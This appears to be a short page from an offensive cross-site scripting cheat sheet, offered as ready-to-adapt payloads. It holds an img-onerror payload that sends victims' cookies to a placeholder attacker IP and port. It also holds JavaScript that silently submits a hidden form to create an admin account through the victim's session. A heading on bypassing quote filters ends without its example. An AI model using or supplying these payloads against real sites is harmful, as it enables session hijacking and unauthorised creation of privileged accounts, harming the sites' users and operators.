Exploitation

Before stealing cookies make sure http only is set to false.

<img src onerror=window.location.replace("http://[IP]:[PORT]/a"+document.cookie);>

Execute action with JavaScript

Whenever you want to execute some action as another user using XSS you can take the payload below and modify it to your needs.

var form = document.createElement("form");
form.method = "POST";
form.action = "http://[URL]:PORT/admin/users/create";

["name", "email", "isAdmin", "isMod"].forEach(function (key) {
  var input = document.createElement("input");
  input.type = "hidden";
  input.name = key;
  input.value = {
    name: "exploit",
    email: "aa",
    isAdmin: "True",
    isMod: "True"
  }[key];
  form.appendChild(input);
});

document.body.appendChild(form);
form.submit();

No ' or " version

Sometimes some chars are blacklisted - in the example below we sucessfully bypassed the blacklisting using backticks:

Last updated